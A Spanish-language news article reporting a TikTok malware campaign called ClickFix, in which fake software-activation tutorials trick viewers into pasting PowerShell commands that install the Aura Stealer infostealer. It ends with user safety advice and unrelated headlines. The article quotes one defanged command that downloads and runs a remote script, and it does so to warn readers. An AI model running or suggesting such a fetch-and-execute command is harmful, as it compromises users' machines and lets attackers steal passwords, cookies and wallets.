TikTok, una de las plataformas más populares del mundo, se ha convertido también en un terreno fértil para el fraude digital. En los últimos días, expertos en ciberseguridad han alertado sobre una nueva campaña maliciosa que utiliza videos aparentemente inofensivos para engañar a los usuarios y comprometer la seguridad de sus dispositivos. El ataque aprovecha la confianza que millones de personas depositan en los contenidos de esta red social, especialmente en aquellos que prometen soluciones rápidas o beneficios gratuitos.
La amenaza fue identificada por investigadores del SANS Internet Storm Center, quienes advierten que los atacantes están publicando tutoriales falsos que enseñan supuestos métodos para acceder gratis a servicios de pago, como Netflix, Spotify, Windows o Photoshop. Sin embargo, detrás de estos videos se ocultan comandos que instalan software malicioso en los equipos de las víctimas.
Aunque el formato de los videos resulta familiar —breves, directos y con instrucciones simples—, su verdadero propósito es ejecutar códigos diseñados para robar información sensible y abrir la puerta a otros ataques. Los expertos recomiendan desconfiar de cualquier contenido que prometa obtener beneficios sin costo o activar programas sin licencia.
Una campaña bautizada como “ClickFix”
El ataque ha sido bautizado como ClickFix, y se basa en un patrón común en TikTok: tutoriales que muestran comandos para copiar y pegar en el sistema operativo, generalmente a través de PowerShell, una herramienta de administración avanzada en Windows.
De acuerdo con el analista de seguridad Xavier Mertens, uno de los ejemplos más difundidos es un video que supuestamente enseña cómo activar Photoshop gratis. En la pantalla aparece el siguiente comando:iex (irm slmgr[.]win/photoshop)
Aunque parece inofensivo, este código se conecta en segundo plano con un sitio remoto desde el que descarga y ejecuta otro script malicioso. En cuestión de segundos, el sistema queda comprometido.
El investigador advierte que este método es especialmente peligroso porque no requiere que el usuario descargue ningún archivo. Basta con ejecutar el comando para que el malware entre en acción sin levantar sospechas.
Qué hace el malware instalado
Los expertos han identificado que uno de los programas descargados por este método es una variante del Aura Stealer, un tipo de malware diseñado para robar información confidencial. Este software puede extraer contraseñas almacenadas, cookies de sesión e incluso datos de carteras de criptomonedas.
Además, los investigadores sospechan que el segundo componente del ataque funciona como un cargador de código, lo que permite a los atacantes añadir nuevas funciones o descargar otros virus en el futuro. En otras palabras, el sistema de la víctima queda permanentemente vulnerable, incluso si el primer malware es eliminado.
Los daños pueden ir más allá del robo de datos personales. Este tipo de infecciones también se utilizan para secuestrar cuentas, distribuir spam o convertir los dispositivos en parte de una red de bots que realizan ataques automatizados.
Qué recomiendan los expertos
Frente a esta nueva ola de estafas, los especialistas en ciberseguridad insisten en mantener una regla básica: nunca ejecutar comandos ni scripts que provengan de redes sociales o fuentes desconocidas.
También recomiendan instalar soluciones antivirus actualizadas, evitar descargas fuera de los canales oficiales y desconfiar de cualquier método que ofrezca acceso gratuito a servicios o software de pago. En caso de haber ejecutado comandos sospechosos, se aconseja realizar un análisis completo del equipo y cambiar todas las contraseñas vinculadas al navegador o aplicaciones.
Las plataformas sociales, por su parte, enfrentan el desafío de detectar y eliminar este tipo de contenidos antes de que lleguen a más usuarios. Sin embargo, la velocidad con la que se propagan los videos y la facilidad para replicar las estafas complican la tarea.
Últimas Noticias
Qué es la tecnología de infrasonido, el método que promete extinguir incendios sin agua
El dispositivo, basado en décadas de investigación, actúa de manera automática para proteger casas de brasas y chispas, y podría sumarse pronto a otras estrategias de seguridad ambiental
Disney+ integrará inteligencia artificial para crear videos cortos con personajes icónicos
La integración de herramientas generativas y la colaboración con Epic Games inauguran una etapa interactiva en la plataforma, permitiendo a los usuarios crear y compartir contenido oficial
Crea con inteligencia artificial tu propio villancico para esta Navidad
Las plataformas IA revolucionan el acceso a la música festiva, permitiendo adaptar letras, estilos y emociones en cuestión de minutos
Cómo configurar tu computador para que Windows te ‘robe’ menos internet en funciones que no usas
Esta es una solución principalmente útil para resolver problemas de lentitud en videojuegos, streaming y descargas
Cómo conectar el celular al televisor sin cables o aplicaciones para ver películas en Navidad
Una alternativa para compartir en familia es aprovechar la función de duplicado de pantalla, disponible en la mayoría de dispositivos Android y plataformas streaming
